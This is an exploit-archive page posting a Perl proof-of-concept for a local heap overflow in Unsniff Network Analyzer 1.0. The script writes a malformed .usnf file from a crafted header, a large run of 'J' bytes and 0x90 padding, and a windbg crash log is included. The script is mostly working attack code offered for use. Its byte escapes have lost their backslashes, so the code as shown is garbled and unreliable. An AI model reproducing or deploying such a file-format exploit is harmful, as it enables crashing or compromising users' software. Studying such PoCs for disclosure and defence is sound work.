Home / os / win10

unsniff-overflow.txt

Posted on 07 April 2009

#!/usr/bin/perl
#
# Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
#
# Summary: Dont just look at hex dumps and protocol trees. With Unsniff
# Network Analyzer, you can view network traffic at various levels of detail.
# View high level objects like images, video, HTML pages, VOIP calls, drill
# down to individual TCP sessions, then onto reassembled PDUs, then finally
# to individual packets. All this functionality is packed in a cool graphical
# interface.
#
# Product web page: http://www.unleashnetworks.com/unsniff/unsniff-2.html
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
# ----------------------------windbg outpootz-------------------------------
#
# HEAP[usnfctr.exe]: Invalid allocation size - 88888880 (exceeded 7ffdefff)
# (998.d08): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=22222220 edx=00000000 esi=01248c58 edi=00000000
# eip=018468d1 esp=0012c754 ebp=0012c7dc iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
# vocore2u!CatFactory_SysLASwizzle+0x24602:
# 018468d1 f3ab            rep stos dword ptr es:[edi]
# Missing image name, possible paged-out or corrupt data.
#
# --------------------------------------------------------------------------
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 06.04.2009
#





$a="x01x00x00x00x11".
"x27x00x00x56x00x4Fx00x44".
"x00x41".	      "x00".	    "x54x00".
"x42x00".	      "x53".	     "x00x31".
"x00". "x00".     "x00".	  "x00". "x00".
"x00x00".	      "x00".	      "x00x00".
"x00x00".	      "x00".	      "x00x00".
"x00x00".	    "x00x00".	      "x00x00".
"x00x20".    "x00".  "x00".    "x00x10".
"x00x00".  "x00".    "x40".  "x00x00".
"x00x40x04".           "x00x02x00".
"x40x00";$b="x4A"x300000;$c="x0D".
"x0A"x10;$d="x90"x20;$e="x00".
"x00".
#############
"x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x2Cx24x00x00x2Ax24".
"x00x00". "x29x24x00x00x27x24". "x00x00".
"x26x24". "x00x00x24x24x00x00". "x23x24".
"x00x00". "x21x24x00x00x20x24". "x00x00".
"x1Ex24". "x00x00x1Dx24x00x00". "x1Bx24".
"x00x00". "x1Ax24x00x00x18x24". "x00x00".
"x17x24". "x00x00x15x24x00x00". "x14x24".
"x00x00". "x12x24x00x00x11x24". "x00x00".
"x0Fx24". "x00x00x0Ex24x00x00". "x0Cx24".
"x00x00". "x0Bx24x00x00x09x24". "x00x00".
"x08x24". "x00x00x06x24x00x00". "x05x24".
"x00x00". "x03x24x00x00x02x24". "x00x00".
"x00x24x00x00xFFx23".
"x00x00xFDx23x00x00".
"xFCx23x00x00xFAx23".
"x00x00xF9x23x00x00".
"xF7x23x00x00xF6x23x00x00".
"xF4x23x00x00xF3x23x00x00xF1x23".
"x00x00xF0x23x00x00xEEx23x00".
"x00xEDx23x00x00";
$file="Denny_Crane.usnf";
open j, ">./$file";
###########################
###################
#-#-#-##-#-#-#
#t00t#

print j $a.$b.$c.$d.$b.$c.$d.$e;
close j;sleep 1;print "
Yeah.
";
print "File $file successfully landed!
";

 

TOP

Malware :

Exploits :